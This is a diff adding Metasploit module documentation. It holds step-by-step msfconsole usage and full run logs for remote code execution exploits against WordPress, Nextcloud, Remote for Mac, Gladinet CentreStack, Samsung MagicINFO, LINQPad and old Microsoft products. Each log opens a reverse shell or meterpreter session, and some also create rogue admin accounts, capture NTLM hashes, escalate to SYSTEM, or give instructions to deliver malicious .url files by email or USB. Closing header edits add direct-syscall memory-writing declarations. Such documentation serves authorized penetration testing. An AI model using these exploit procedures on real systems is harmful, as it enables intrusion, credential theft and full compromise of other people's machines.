+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected WordPress version: 6.8.1
+[+] Detected user-registration version 4.1.1
+[+] The target appears to be vulnerable.
+[*] Registering new user with free membership...
+[+] User registered: eviluser2
+[*] Escalating to administrator...
+[+] Administrator created: eviluser2:Str0ngP@ss!
+[*] Authenticating via wp-login.php…
+[!] wp-login.php failed—trying plugin login page
+[+] Authenticated via plugin login page
+[*] Uploading malicious plugin...
+[*] Executing payload at /wp-content/plugins/wp_mwtqu/ajax_nncym.php...
+[*] Sending stage (3045380 bytes) to 172.27.0.3
+[+] Deleted ajax_nncym.php
+[+] Deleted wp_mwtqu.php
+[+] Deleted ../wp_mwtqu
+[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.27.0.3:59124) at 2025-05-09 16:56:39 +0200
+
+meterpreter > sysinfo
+Computer     : 172.27.0.3
+OS           : Debian 12.10 (Linux 6.14.2-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,40 @@
+# Module Documentation: Remote for Mac 2025.6 - Unauthenticated RCE
+
+## Overview
+
+This module exploits an unauthenticated remote code execution (RCE) vulnerability in **Remote for Mac 2025.6**. When the **"Allow unknown devices"** setting is enabled (disabled by default), the `/api/executeScript` endpoint allows unauthenticated attackers to execute arbitrary AppleScript commands, including shell commands, on the target macOS system.
+
+**Exploit Author:** [Chokri Hammedi](https://packetstormsecurity.com/files/195347/)
+
+**Module Path:** `modules/exploits/osx/http/remote_for_mac_rce.rb`
+
+## Vulnerable Application
+
+- **Vendor:** Evgeny Cherpak
+- **Homepage:** [https://cherpake.com/](https://cherpake.com/)
+- **Download:** [https://cherpake.com/latest.php?os=mac](https://cherpake.com/latest.php?os=mac)
+- **Affected Version:** Remote for Mac 2025.6
+- **Tested on:** macOS Mojave 10.14.6
+
+## Vulnerability Details
+
+- **Endpoint:** `/api/executeScript`
+- **Vulnerability:** Missing authentication
+- **Trigger Condition:** The app must have **"Allow unknown devices"** enabled.
+- **Impact:** Full command execution as the logged-in user.
+
+The exploit sends a specially crafted GET request with AppleScript payload headers to the unauthenticated endpoint. The server executes the `do shell script` AppleScript, leading to remote command execution.
+
+## Usage Example
+
+From within `msfconsole`:
+
+```bash
+use exploit/osx/http/remote_for_mac_rce
+set RHOSTS 192.168.1.100
+set RPORT 443
+set SSL true
+set PAYLOAD cmd/unix/reverse_bash
+set LHOST 192.168.1.50
+run
+
@@ -0,0 +1,148 @@
+## Description
+
+This module exploits a command injection that leads to a remote execution in Nextcloud installations if the app Workflow External Scripts is also installed. 
+The vulnerability affects Nextcloud versions >= 24.0.0, >= 25.0.0, >= 18.0.0, >= 19.0.0, >= 20.0.0, >= 21.0.0, >= 22.0.0, >= 23.0.0, >= 24.0.0, >= 25.0.0
+
+A missing scope validation allowed users to create workflows which are designed to be only available for administrators. In combination with Workflow External Script, this vulnerability
+leads to authenticated remote command execution.
+
+More about the vulnerability detail: [CVE-2023-26482](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-26482).
+
+The module will automatically use `cmd/linux/http/x64/meterpreter/reverse_tcp` payload.
+
+The module will check if the target is vulnerable, by adding and removing a dummy-workflow.
+
+
+## Vulnerable Application
+
+[Nextcloud](https://nextcloud.com/) is a suite of client-server software for creating and using file hosting services.
+
+This module has been tested successfully on Nextcloud versions:
+
+* Nextcloud version 24.0.5
+
+### Source and Installers
+
+* [Source Code Repository](https://github.com/nextcloud/server/releases/tag/v24.0.5)
+* [Docker](https://hub.docker.com/_/nextcloud)
+
+### Docker Installation
+
+This exploit was tested using a [nextcloud docker container](https://hub.docker.com/_/nextcloud) and [docker-compose](https://docs.docker.com/compose/)
+with the following docker-compose.yml:
+
+```yaml
+volumes:
+  nextcloud:
+  db:
+
+services:
+  db:
+    image: mariadb:10.6
+    restart: always
+    command: --transaction-isolation=READ-COMMITTED --log-bin=binlog --binlog-format=ROW
+    volumes:
+      - db:/var/lib/mysql
+    environment:
+      - MARIADB_ROOT_PASSWORD=root
+      - MARIADB_PASSWORD=root
+      - MARIADB_DATABASE=nextcloud
+      - MARIADB_USER=nextcloud
+
+  app:
+    image: nextcloud:24.0.5
+    restart: always
+    ports:
+      - 8080:80
+    links:
+      - db
+    environment:
+      - MYSQL_PASSWORD=root
+      - MYSQL_DATABASE=nextcloud
+      - MYSQL_USER=root
+      - MYSQL_HOST=db
+      - NEXTCLOUD_ADMIN_PASSWORD=admin
+      - NEXTCLOUD_ADMIN_USER=admin
+      - NEXTCLOUD_TRUSTED_DOMAINS="192.168.233.64:8080"
+    depends_on:
+      - db
+```
+
+**_NOTE:_** Change the IP-address and port for NEXTCLOUD_TRUSTED_DOMAINS for your setup
+
+After `docker compose up -d` login as admin and install the workflow app: "Workflow external script" and
+create a low privileged user `alice`. Make sure that you choose "Cron(Recommended)" in the Settings for "Background Jobs".
+Before we can run the exploit, we need to start the cronjob. This is crucial because otherwise the
+payload doesn't get triggered:
+
+```
+docker exec -it -u www-data nextcloud-app-1 /bin/bash
+watch -n2 php cron.php
+```
+
+Wait until you the watch-command outputs something like: "Every 2.0s: php cron.php". 
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Do: `use exploit/unix/webapp/nextcloud_workflows_rce`
+2. Do: `set RHOSTS [ips]`
+3. Do: `set LHOST [lhost]`
+4. Do: `set RPORT 8080`
+5. Do: `set USERNAME alice`
+6. Do: `set PASSWORD alice-password`
+7. Do: `run`
+8. You should get a shell after a while
+
+## Options
+
+### TARGETURI
+
+Remote web path to the nextcloud installation (default: /)
+
+### USERNAME
+
+The low-privileged username to authenticate to nextcloud
+
+### PASSWORD
+
+The password for the low-privileged user
+
+## Scenarios
+
+In this scenario the zoneminder-server has the IP address 192.42.0.254. The IP address of the metasploit host is
+192.42.1.188.
+
+### Nextcloud 24.0.5(docker-compose) 
+
+The following demo shows how to use the exploit:
+
+```
+msf6 > use exploit/unix/webapp/nextcloud_workflows_rce
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set RHOSTS 192.168.233.64
+RHOSTS => 192.168.233.64
+msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set LHOST 192.168.233.117
+LHOST => 192.168.233.117
+msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set RPORT 8080
+RPORT => 8080
+msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set USERNAME alice
+USERNAME => alice
+msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set PASSWORD CaeD4ohchaiv5ieDooBa
+PASSWORD => CaeD4ohchaiv5ieDooBa
+msf6 exploit(unix/webapp/nextcloud_workflows_rce) > run
+[*] Started reverse TCP handler on 192.168.233.117:4444
+[*] Sending payload..
+[+] Workflow created
+[*] Waiting for the payload to connect back ..
+[*] Sending stage (3045380 bytes) to 192.168.233.64
+[*] Meterpreter session 1 opened (192.168.233.117:4444 -> 192.168.233.64:37090) at 2025-04-10 13:27:49 +0000
+[+] Payload connected!
+[*] Cleaning up
+
+meterpreter > getuid
+Server username: www-data
+```
+
+## Limitations
+Ensure that your `WfsDelay` advanced option is set to a value that allows `cron` to execute the payload. Default is 16 minutes
@@ -0,0 +1,52 @@
+## Vulnerable Application
+
+This module exploits a stack buffer overflow in Microsoft Visual
+Studio 6.0. When passing a specially crafted string to the Mask
+parameter of the Mdmask32.ocx ActiveX Control, an attacker may
+be able to execute arbitrary code.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/windows/browser/ms08_070_visual_studio_msmask`
+1. Do: `set SRVHOST [host]`
+1. Do: `set SRVPORT [port]`
+1. Do: `set URIPATH [uri]`
+1. Do: `set PAYLOAD [payload]`
+1. Do: `run`
+1. Open the server URL on a vulnerable system
+
+
+## Options
+
+### URIPATH
+
+The server URI path to use. (default: `/`)
+
+
+## Scenarios
+
+### Windows XP SP3 (x86) (English)
+
+```
+msf6 > use exploit/windows/browser/ms08_070_visual_studio_msmask
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > set srvhost 0.0.0.0
+srvhost => 0.0.0.0
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > set srvport 8080
+srvport => 8080
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] Using URL: http://192.168.200.130:8080/
+[*] Server started.
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > 
+[*] 192.168.200.173  ms08_070_visual_studio_msmask - Sending Microsoft Visual Studio Mdmask32.ocx ActiveX Stack Buffer Overflow
+[*] Sending stage (240 bytes) to 192.168.200.173
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.173:1052) at 2025-06-22 03:01:18 -0400
+```
@@ -0,0 +1,87 @@
+## Vulnerable Application
+
+This module exploits a stack buffer overflow in Microsoft Visual Basic
+6.0. A specially crafted Visual Basic Project (VBP) file containing
+a long reference line can be used to execute arbitrary code.
+
+This module has been tested successfully on:
+
+* Windows XP Home SP0 (x86) (English)
+* Windows XP Professional SP0 (x86) (English)
+* Windows XP Professional SP1 (x86-64) (English)
+* Windows XP Professional SP2 (x86-64) (English)
+* Windows XP Professional SP3 (x86) (English)
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/windows/fileformat/ms_visual_basic_vbp`
+1. Do: `set filename [filename.vbp]`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `set payload windows/shell/reverse_tcp`
+1. Do: `run`
+1. Do: `use exploit/multi/handler`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `set payload windows/shell/reverse_tcp`
+1. Do: `run -jz`
+1. Open `/home/user/.msf4/local/msf.vbp` on a vulnerable system
+
+## Options
+
+### FILENAME
+
+The project file name. (Default: `msf.vbp`).
+
+## Scenarios
+
+### Windows XP SP3 (x86) (English)
+
+```
+msf6 > use exploit/windows/fileformat/ms_visual_basic_vbp
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   Windows XP SP0-SP3 (x86) (English)
+    1   Windows XP SP1-SP2 (x86-64) (English)
+
+
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > run
+[*] Creating 'msf.vbp' file for Windows XP SP0-SP3 (x86) (English) ...
+[+] msf.vbp stored at /home/user/.msf4/local/msf.vbp
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > use exploit/multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
+payload => windows/shell/reverse_tcp
+msf6 exploit(multi/handler) > run -jz
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+msf6 exploit(multi/handler) > mv /home/user/.msf4/local/msf.vbp /var/www/html/msf.vbp
+[*] exec: mv /home/user/.msf4/local/msf.vbp /var/www/html/msf.vbp
+
+msf6 exploit(multi/handler) > 
+[*] Sending stage (240 bytes) to 192.168.200.173
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.173:1037) at 2025-06-21 08:03:44 -0400
+
+msf6 exploit(multi/handler) > sessions -i 1
+[*] Starting interaction with 1...
+
+
+Shell Banner:
+Microsoft Windows XP [Version 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+
+C:\Documents and Settings\Administrator\Desktop>
+```
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+CVE-2025-33053 - Internet Shortcut (.url) UNC Path Exploit
+
+Windows improperly handles `.url` (Internet Shortcut) files referencing remote
+UNC paths. Specifically, `.url` files that specify a remote working directory
+(`WorkingDirectory=\\attacker\webdav`) and a trusted executable (e.g.,
+`iediagcmd.exe`) may cause the system to access the attacker's server when opened.
+
+This behavior can be exploited to:
+
+- Trigger NTLM authentication leaks (SMB relay)
+- Load remote payloads via WebDAV shares
+- Attempt DLL sideloading if conditions allow
+
+## Affected Versions
+
+- Windows 10 22H2
+- Windows 11 23H2
+- Fully patched prior to June 2025 Patch Tuesday
+
+## Verification Steps
+
+1. Run: `use windows/fileformat/unc_url_cve_2025_33053`
+2. Run: `set LHOST [IP address]`
+3. Run: `set SRVHOST [IP address]`
+4. Run: `run`
+5. Deliver the `.url` to the target (email, USB, zip)
+6. On victim's machine, open `.url`
+7. Payload execution
+
+### Overview
+
+This module generates a malicious `.url` Internet Shortcut file that abuses
+CVE-2025-33053 — a vulnerability in how Windows handles `.url` files referencing remote UNC
+paths.
+
+When opened on a vulnerable system, the `.url` causes the system to connect to a
+UNC path(e.g., a WebDAV or SMB share), triggering an attempt to execute a trusted binary
+from the attacker's location. This can result in RCE or credential leaks.
+
+
+## Options
+
+### OUTFILE
+This option allows user to define their own .url file. If this option is not set, the module will generate random .url file - `YWSXVjpW.url`.
+
+### FOLDER_NAME
+The `FOLDER_NAME` option defines SMB share folder, where the final payload file is stored. Generally can be anything, default is `webdav`.
+
+### FILE_NAME
+This option defines payload file stored in SMB share. This option should not change as it is bound to executable in `URL` parameter of `.url` file. The default value is `explorer.exe`.
+
+
+## Scenarios
+
+```
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > run verbose=true 
+[*] Exploit running as background job 2.
+[*] Exploit completed, but no session was created.
+
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > [*] Started reverse TCP handler on 192.168.3.7:4444 
+[*] URL file: /home/ms/.msf4/local/YWSXVjpW.url, deliver to target's machine and wait for shell
+[*] Run following: curl http://192.168.3.7:8080/YWSXVjpW.url -o YWSXVjpW.url
+[*] Server is running. Listening on 192.168.3.7:4445
+[*] The SMB service has been started.
+[*] Received SMB connection from 10.5.132.137
+[SMB] NTLMv2-SSP Client     : 10.5.132.137
+[SMB] NTLMv2-SSP Username   : WIN10_22H2_7FD2\msfuser
+[SMB] NTLMv2-SSP Hash       : msfuser::WIN10_22H2_7FD2:[HASH]
+
+[*] Sending stage (203846 bytes) to 10.5.132.137
+[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.137:49740) at 2025-06-24 16:08:56 +0200
+
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > sessions 
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                Connection
+  --  ----  ----                     -----------                                ----------
+  1         meterpreter x64/windows  WIN10_22H2_7FD2\msfuser @ WIN10_22H2_7FD2  192.168.3.7:4444 -> 10.5.132.137:49740 (10.5.132.137)
+
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WIN10_22H2_7FD2
+OS              : Windows 10 22H2+ (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+```
+
+
+## References
+
+- [GitHub PoC](https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept)
+- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-33053)
+- [LOLBAS Project](https://lolbas-project.github.io)
+- [Microsoft Advisory](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053)
+
@@ -0,0 +1,110 @@
+## Vulnerable Application
+A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState
+could allow an attacker to forge ViewState data.
+This can lead to unauthorized actions such as remote code execution.
+Both applications make use of a hardcoded machineKey in the IIS web.config file, which is responsible for securing
+ASP.NET ViewState data. If an attacker obtains the machineKey, they can forge ViewState payloads that pass integrity checks.
+This can result in ViewState deserialization attacks, potentially leading to remote code execution (RCE) on the web server.
+
+* Gladinet CentreStack versions up to 16.4.10315.56368 are vulnerable (fixed in 16.4.10315.56368).
+* Gladinet Triofox versions up to 16.4.10317.56372 are vulnerable (fixed in 16.4.10317.56372)
+
+The following releases were tested.
+
+**Gladinet CentreStack and Triofox:**
+* Gladinet CentreStack Build 16.1.10296.56315 on Windows Server 2019
+* Gladinet Triofox Build 16.1.10296.56315 on Windows Server 2019
+
+## Installation steps to install Gladinet CentreStack or Triofox Enterprise Editions
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download an evaluation Windows Server iso image (2016, 2019 or 2022) and install it as a VM on your virtualization engine.
+* Note: Google is your best friend on how to do this ;-)
+* Download the [Gladinet CentreStack gui installer](https://www.centrestack.com/p/gce_latest_release.html) or...
+* Download the [Gladinet Triofox gui installer](https://access.triofox.com/releases_history/).
+* Note: For Triofox, you will need a free trail account to reach the installer page.
+* Run the gui installer on your Windows VM.
+* Reboot your VM and you should be able to access the application via `https://your_ip/portal/loginpage.aspx`.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/windows/http/gladinet_viewstate_deserialization_cve_2025_30406`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=Windows Command>`
+- [ ] `exploit`
+- [ ] you should get a `shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+No specific options defined for this module.
+
+## Scenarios
+### Gladinet CentreStack Build 16.1.10296.56315 on Windows Server 2019 -  Windows Command target
+```msf
+msf6 > use exploits/windows/http/gladinet_viewstate_deserialization_cve_2025_30406
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/gladinet_viewstate_deserialization_cve_2025_30406) > set rhosts 192.168.201.5
+rhosts => 192.168.201.5
+msf6 exploit(windows/http/gladinet_viewstate_deserialization_cve_2025_30406) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. CentreStack (Build 16.1.10296.56315)
+[*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (203846 bytes) to 192.168.201.5
+[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.5:49897) at 2025-05-02 20:36:56 +0000
+
+meterpreter > getuid
+Server username: IIS APPPOOL\portal
+meterpreter > sysinfo
+Computer        : WIN-BJDNH44EEDB
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > pwd
+c:\windows\system32\inetsrv
+meterpreter > getsystem
+...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+###  Gladinet Triofox Build 16.1.10296.56315 on Windows Server 2019 - Windows Command target
+```msf
+msf6 exploit(windows/http/gladinet_viewstate_deserialization_cve_2025_30406) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(windows/http/gladinet_viewstate_deserialization_cve_2025_30406) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Triofox (Build 16.1.10296.56315)
+[*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (203846 bytes) to 192.168.201.6
+[*] Meterpreter session 4 opened (192.168.201.8:4444 -> 192.168.201.6:56815) at 2025-05-02 19:55:59 +0000
+
+meterpreter > getuid
+Server username: IIS APPPOOL\portal
+meterpreter > sysinfo
+Computer        : WIN-HHRQENPDSRS
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : EVIL
+Logged On Users : 14
+Meterpreter     : x64/windows
+meterpreter > pwd
+c:\windows\system32\inetsrv
+meterpreter > getsystem
+...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+## Limitations
+No limitations identified.
@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a path traversal vulnerability in Samsung MagicINFO 9 <= 21.1050.0 (CVE-2024-7399).
+
+Remote code execution can be obtained by exploiting the path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet,
+which can be queried by an unauthenticated user to upload a JSP shell.
+By default, the application listens on TCP ports 7001 (HTTP) and 7002 (HTTPS) on all network interfaces and runs in the context of NT
+AUTHORITY\SYSTEM.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor]
+(https://www.samsung.com/us/business/solutions/digital-signage-solutions/magicinfo/).
+
+**Successfully tested on**
+
+- MagicINFO 9 21.1040.2 on Windows 10 (22H2)
+
+## Verification Steps
+
+1. Install Postgres or MySQL
+2. Install the application
+3. Activate the license
+4. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/windows/http/magicinfo_traversal 
+msf6 exploit(windows/http/magicinfo_traversal) > set RHOSTS <IP>
+msf6 exploit(windows/http/magicinfo_traversal) > exploit 
+```
+
+You should get a shell in the context of `NY AUTHORITY\SYSTEM`.
+
+## Options
+
+### DEPTH
+The traversal depth. The FILE path will be prepended with ../ * DEPTH.
+
+## Scenarios
+
+Running the exploit against MagicINFO 9 21.1040.2 on Windows 10 should result in an output similar to the
+following:
+
+```
+msf6 exploit(windows/http/magicinfo_traversal) > exploit 
+
+[*] Started reverse TCP handler on 192.168.137.204:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] MagicINFO version detected: MagicINFO 9 Server 21.1040.2
+[+] The target appears to be vulnerable.
+[*] Uploading payload...
+[*] Upload successful
+[*] Payload executed!
+[*] Command shell session 3 opened (192.168.137.204:4444 -> 192.168.137.230:50038) at 2025-05-14 17:36:47 -0400
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.19045.3208]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\MagicInfo Premium\tomcat\bin>
+-----
+          
+
+C:\MagicInfo Premium\tomcat\bin>whoami
+whoami
+nt authority\system
+
+C:\MagicInfo Premium\tomcat\bin>
+```
@@ -0,0 +1,55 @@
+## LINQPad 5.48 Deserialization
+
+LINQPad is a scratchpad for .NET programming. Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting. Application can be downloaded from [here](https://www.linqpad.net/).
+
+## Verification Steps
+Steps:
+
+1. Install the application
+2. Start msfconsole
+3. Get Meterpreter/cmd shell
+4. Run: `use windows/local/linqpad_deserialization`
+5. Set payload - for example `set payload cmd/windows/generic` - and corresponding parameters
+5. Set parameters `session`, `cache_path`, `linqpad_path`, `cleanup`
+6. Run exploit
+
+## Options
+
+### cleanup
+
+Enable cleanup of malicious file. The module will replace cache filewith malicious content. If `cleanup` is enabled, after successful execution, the module will remove malicious cache file. The original file will be restored upon re-execution of Linqpad.
+
+
+### cache\_path
+
+The parameter sets path for folder, where vulnerable cache file is present. This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file. 
+
+### linqpad\_path
+
+Final part of exploit runs the LINQPad to trigger deserialization procedure. The `linpad_path` parameter sets the path to LINQPad binary, which is ran at the end of exploit.
+
+Example:
+
+```
+msf6 > use exploit/multi/handler
+msf6 exploit(multi/handler) > set LHOST 192.168.95.128
+msf6 exploit(multi/handler) > set LPORT 4242
+msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
+msf6 exploit(multi/handler) > run
+[*] Started reverse TCP handler on 192.168.95.128:4242 
+[*] Meterpreter session 1 opened (192.168.95.128:4242 -> 192.168.95.130:53430) at 2024-12-30 12:46:16 +0100
+
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use windows/local/linqpad_deserialization
+msf6 exploit(windows/local/linqpad_deserialization) > set LINQPAD_FILE C:/ProgramData/LINQPad/Updates50.AnyCPU/552/LINQPad.exe
+msf6 exploit(windows/local/linqpad_deserialization) > set payload windows/exec/cmd
+msf6 exploit(windows/local/linqpad_deserialization) > set cache_path C:/Users/ms/AppData/Local/LINQPad
+msf6 exploit(windows/local/linqpad_deserialization) > set CMD calc.exe
+msf6 exploit(windows/local/linqpad_deserialization) > set session 1
+msf6 exploit(windows/local/linqpad_deserialization) > exploit
+[*] Exploit completed, but no session was created.
+```
+
+Previous example will run `calc.exe` when LINQPad will start.
+
@@ -1,7 +1,7 @@
 ## Vulnerable Application

 This module supports running an SMB server which validates credentials, and then attempts to
-execute a relay attack against the configured RELAY_TARGETS hosts.
+execute a relay attack against the configured RHOSTS hosts.

 Supports SMBv2, SMBv3, and captures NTLMv1 as well as NTLMv2 hashes.
 SMBv1 is not supported - please see https://github.com/rapid7/metasploit-framework/issues/16261
@@ -75,7 +75,7 @@ flowchart LR

 ## Options

-### RELAY_TARGETS
+### RHOSTS

 Target address range or CIDR identifier to relay to

@@ -162,8 +162,8 @@ Active sessions
 Multiple targets can be relayed to:

 ```
-msf6 exploit(windows/smb/smb_relay) > set RELAY_TARGETS 192.168.123.4 192.168.123.25
-RELAY_TARGETS => 192.168.123.4 192.168.123.25
+msf6 exploit(windows/smb/smb_relay) > set RHOSTS 192.168.123.4 192.168.123.25
+RHOSTS => 192.168.123.4 192.168.123.25
 msf6 exploit(windows/smb/smb_relay) >
 [*] Started reverse TCP handler on 192.168.123.1:4444
 [*] JTR hashes will be split into two files depending on the hash format.
@@ -261,8 +261,8 @@ Server:
 ```
 msf6 exploit(windows/smb/smb_relay) > set JOHNPWFILE ./relay_results.txt
 JOHNPWFILE => ./relay_results.txt
-msf6 exploit(windows/smb/smb_relay) > set RELAY_TARGETS 192.168.123.4 192.168.123.25
-RELAY_TARGETS => 192.168.123.4 192.168.123.25
+msf6 exploit(windows/smb/smb_relay) > set RHOSTS 192.168.123.4 192.168.123.25
+RHOSTS => 192.168.123.4 192.168.123.25
 msf6 exploit(windows/smb/smb_relay) > run
 [*] Exploit running as background job 9.
 [*] Exploit completed, but no session was created.
@@ -58,7 +58,7 @@ typedef struct _PEB {
 			BOOLEAN IsImageDynamicallyRelocated : 1;
 			BOOLEAN SkipPatchingUser32Forwarders : 1;
 			BOOLEAN SpareBits : 3;
-		};
+		} _bitField;
 	};
 	HANDLE Mutant;

@@ -84,7 +84,7 @@ typedef struct _PEB {
 			ULONG ProcessCurrentlyThrottled : 1;
 			ULONG ProcessImagesHotPatched : 1;
 			ULONG ReservedBits0 : 24;
-		};
+		} _crossProcessFlags;
 	};
 	union
 	{
@@ -145,7 +145,7 @@ typedef struct _LDR_DATA_TABLE_ENTRY {
 		{
 			PVOID SectionPointer;
 			ULONG CheckSum;
-		};
+		} _hashLinks;
 	};
 	union
 	{
@@ -184,6 +184,30 @@ typedef ULONG(NTAPI *_EtwEventWriteFull)(
 	__in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData
 	);

+typedef NTSTATUS(NTAPI* pNtProtectVirtualMemory)(
+	HANDLE ProcessHandle,
+	PVOID* BaseAddress,
+	PSIZE_T RegionSize,
+	ULONG NewProtect,
+	PULONG OldProtect
+	);
+
+typedef NTSTATUS (NTAPI* pNtWriteVirtualMemory)(
+	HANDLE ProcessHandle,
+	PVOID BaseAddress,
+	PVOID Buffer,
+	ULONG NumberOfBytesToWrite,
+	PULONG NumberOfBytesWritten
+);
+
+typedef NTSTATUS(NTAPI* pNtReadVirtualMemory)(
+	HANDLE ProcessHandle,
+	PVOID BaseAddress,
+	PVOID Buffer,
+	ULONG NumberOfBytesToRead,
+	PULONG NumberOfBytesRead
+	);
+
 // Windows 7 SP1 / Server 2008 R2 specific Syscalls
 EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
 EXTERN_C NTSTATUS ZwReadVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
@@ -202,33 +226,24 @@ EXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, P


 // Windows 10 / Server 2016 specific Syscalls
+#ifdef _X64
 EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
 EXTERN_C NTSTATUS ZwReadVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+#else
+EXTERN_C NTSTATUS ZwProtectVirtualMemory10_1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
